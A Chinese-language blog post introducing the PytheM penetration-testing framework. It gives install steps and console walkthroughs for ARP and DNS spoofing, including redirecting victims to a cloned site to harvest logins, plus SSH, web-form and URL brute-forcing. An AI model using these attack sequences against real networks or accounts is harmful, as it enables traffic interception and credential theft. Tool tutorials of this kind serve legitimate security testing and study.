python 渗透框架_Python渗透测试框架:PytheM
PytheM是一個Python滲透測試框架。它只能在osnGNU/Linux OS系統上運行。
安裝$sudo apt-get update
$sudo apt-get install libasound-dev libjack-jackd2-dev portaudio19-dev python-pyaudio build-essential python-dev libnetfilter-queue-dev libespeak1 libffi-dev libssl-dev
$sudo git clone https://github.com/m4n3dw0lf/PytheM/
$cd PytheM
$sudo pip install -r requirements.txt
運行$sudo ./pythem
例子
ARP欺騙-HTTP中間人攻擊
命令:pythem> set interface
[+] Enter the interface: wlan0
pythem> set gateway
[+] Enter the gateway: 192.168.1.1
pythem> arpspoof start
[+] Setting the packet forwarding.
[+] Iptables redefined.
[+] ARP spoofing initialized.
pythem> sniff
[+] Enter the filter: http
ARP+DNS欺騙-重定向到偽造的頁面,收集登錄憑證
使用SET等克隆工具克隆你選中的網站,并部署在Apache2上
命令:pythem> set target
[+] Enter the target(s): 192.168.0.8
pythem> set interface wlan0
pythem> set gateway 192.168.0.1
pythem> arpspoof start
[+] Setting the packet forwarding.
[+] Iptables redefined.
[+] ARP spoofing initialized.
pythem> dnsspoof start
[+] Domain to be spoofed: www.google.com
[+] IP address to be redirected: 192.168.0.6
[+] DNS spoofing initialized.
pythem> sniff dns
SSH暴破-暴力破解pythem> service ssh start
pythem> set target
[+] Enter the target(s): 127.0.0.1
pythem> set file wordlist.txt
pythem> brute-force ssh
[+] Enter the username to bruteforce: anon123
Web頁面參數暴力破解
首先獲取web頁面登錄時的參數格式id= value
顯示重定向頁面,如果定向到一個不同的頁面則說明猜解正確。
命令pythem> set target http://127.0.0.1/
pythem> set file
[+] Enter the path to the file: wordlist.txt
pythem> brute-force webform
[+] Brute-Form authentication initialized.
[+] Enter the input id of the username box: vSIS_ID
[+] Enter the input id of the password box: vSIS_PASS
[+] Enter the username to brute-force the formulary: root
URL內容爆破pythem> set target
[+] Enter the target(s): http://testphp.vulnweb.com/index.php?id=
pythem> set file 1to100.txt
pythem> brute-force url
[+] Content URL bruter initialized.
功能
[ PytheM – Penetration Testing Framework v0.3.2 ]
help:打印幫助信息。
exit/quit:退出程序。
set:設置變量的值,參數:interface
gateway
target
file
arpmode例子:pythem> set interface | open input to set
或者pythem> set interface wlan0 | don't open input to set value
print:
打印變量的值,例子:pythem> print gateway
scan:
進行tcp/manualport/arp掃描.
(應該在設置完網卡和目標后再調用)例子:pythem> scan
或者pythem> scan tcp
arpspoof:
開始或結束arpspoofing攻擊. (使用rep或req可以設置arp欺騙的模式,rep表示欺騙響應,req表示欺騙請求)
參數start
stop
例子:arpspoof startarpspoof stop
dnsspoof:
開始dnsspoofing攻擊. (應該在arp欺騙攻擊開始后再調用)例子:pythem> dnsspoof startpythem> dnsspoof stop
sniff:
開始嗅探數據包(應該在設置網卡后再調用)例子:pythem> sniff http
或者pythem> sniff
[+] Enter the filter: port 1337 and host 10.0.1.5 | tcpdump like format or http,dns specific filter.
pforensic:
開始分析數據包(應該在設置完網卡和.pcap文件后調用)例子:pythem> pforensicpforensic> help
brute-force:
開始暴力破解攻擊(應該在設置完目標和字典文件路徑后調用)參數:ssh | 目標是IP地址ip address as target
url | 目標是url (包含http://或https://)
webform | 目標是url (包含http://或https://)
例子:pythem> brute-force webformpythem> brute-force ssh
geoip:
顯示IP地址的大概位置(應該在設置目標(IP地址)后再調用)例子:pythem> geoip
或者pythem> geoip 8.8.8.8
decode and encode:
以選擇的模式解碼和編碼字符串,例子:pythem> decode base64pythem> encode ascii
cookiedecode:
解碼base64 url編碼的cookie的值,例子:pythem> cookiedecode
其它在控制臺可以執行的命令,比如cd, ls, nano, cat 等。
Jarvis – 聲音控制助手[*] jarvis type jarvis-help to see the jarvis help page.
examples:
pythem> jarvis (以語音識別模式調用Jarvis)
pythem> jarvis-help (打印Jarvis幫助信息)
pythem> jarvis-log (檢查日志)
pythem> jarvis-log err (檢查錯誤日志)
pythem> jarvis-say (命令Jarvis說某些東西)
pythem> jarvis-say hello my name is jarvis.
pythem> jarvis-read (如果沒有指定文件,應該在設置文件后再調用)
pythem> jarvis-read file.txt
總結
以上是生活随笔為你收集整理的python 渗透框架_Python渗透测试框架:PytheM的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: seo 伪原创_胡子哥谈seo优化:那些
- 下一篇: python url拼接_教你写pyth